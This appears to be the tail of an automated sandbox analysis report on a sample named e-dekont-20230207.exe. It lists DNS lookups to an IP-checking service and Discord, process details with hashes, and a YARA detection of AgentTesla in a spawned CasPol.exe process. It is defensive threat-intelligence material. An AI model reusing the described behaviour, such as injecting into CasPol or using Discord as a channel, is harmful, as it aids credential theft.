                    Feb 7, 2023 18:31:28.980236053 CET | 8.8.8.8 | 192.168.2.5 | 0x96d5 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:31:28.980236053 CET | 8.8.8.8 | 192.168.2.5 | 0x96d5 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:31:28.980236053 CET | 8.8.8.8 | 192.168.2.5 | 0x96d5 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:31:33.850213051 CET | 8.8.8.8 | 192.168.2.5 | 0x3a38 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:31:33.850213051 CET | 8.8.8.8 | 192.168.2.5 | 0x3a38 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:31:33.850213051 CET | 8.8.8.8 | 192.168.2.5 | 0x3a38 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:31:33.850213051 CET | 8.8.8.8 | 192.168.2.5 | 0x3a38 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:31:33.850213051 CET | 8.8.8.8 | 192.168.2.5 | 0x3a38 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
                    • api.ipify.org
                    • discord.com


                    Target ID:0
                    Start time:18:31:24
                    Start date:07/02/2023
                    Path:C:\Users\user\Desktop\e-dekont-20230207.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\Desktop\e-dekont-20230207.exe
                    Imagebase:0xfc0000
                    File size:688128 bytes
                    MD5 hash:2FBAA4D917CCE04617F24F87309286D6
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:low

                    Target ID:1
                    Start time:18:31:26
                    Start date:07/02/2023
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                    Imagebase:0x5e0000
                    File size:107624 bytes
                    MD5 hash:F866FC1C2E928779C7119353C3091F0C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.575420221.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:moderate

                    No disassembly